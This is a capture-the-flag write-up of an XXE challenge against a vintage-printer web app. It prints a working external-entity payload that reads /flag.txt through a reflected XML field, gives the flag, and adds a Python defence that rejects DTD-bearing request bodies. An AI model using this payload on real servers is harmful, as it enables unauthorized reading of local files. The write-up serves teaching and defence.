Dot Matrix Destruction - Meta CTF
2024-06-24
Author: Morgen Malinoski
Description
I wanted to buy one of those squeaky old printers from this vintage printer company, but they're all so overpriced. Forget that. Can you just have them print out the flag for us?
The flag is at /flag.txt.
Notes
We are provided with a search bar in a web app. Opening it up in Burp and looking at the POST requests shows that the bodies are XML, so it's probably XXE!

After testing various XXE payloads, this ended up working:
<!DOCTYPE foo [<!ENTITY example SYSTEM "/flag.txt"> ]>
<query>
<search>
1
</search>
<country>&example;</country>
</query>
Putting &example; inside the search element did not work, since nothing in the response reflects the search query. The response does, however, reflect whatever is put in country.
This gave: MetaCTF{y3ah_xxe_d0e5_r0ck_d0esnt_it?}
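On the server side, the fix for this class of bug is to refuse any request body that declares a DTD, so an entity like the one above is never defined, let alone resolved. The sketch below is an added example, not code from the challenge or its author: the backend language is assumed to be Python, and parse_query, is_rejected and the sample bodies are hypothetical names and constructed data.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """The request body carried a DOCTYPE declaration."""


def _on_doctype(name, system_id, public_id, has_internal_subset):
    # Fires at "<!DOCTYPE ...", before any ENTITY declaration is processed.
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed in search requests")


def parse_query(body: bytes) -> dict:
    """Parse a <query> body, refusing any document that declares a DTD."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _on_doctype
    try:
        checker.Parse(body, True)  # first pass: structure check only
    except expat.ExpatError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
    root = ET.fromstring(body)     # second pass: body is known to be DTD-free
    return {tag: (root.findtext(tag) or "").strip()
            for tag in ("search", "country")}


def is_rejected(body: bytes) -> bool:
    """True when parse_query refuses the body because of a DOCTYPE."""
    try:
        parse_query(body)
    except DTDForbidden:
        return True
    return False


# Constructed sample bodies; WITH_DTD has the shape of the request above.
BENIGN = b"<query><search>1</search><country>US</country></query>"
WITH_DTD = (b'<!DOCTYPE foo [<!ENTITY example SYSTEM "/flag.txt"> ]>'
            b"<query><search>1</search><country>&example;</country></query>")

if __name__ == "__main__":
    print(parse_query(BENIGN))
    print("DTD body rejected:", is_rejected(WITH_DTD))
```

Rejecting the DOCTYPE outright is stricter than only disabling external entity resolution, and it also covers internal-entity expansion tricks that rely on the same declaration syntax.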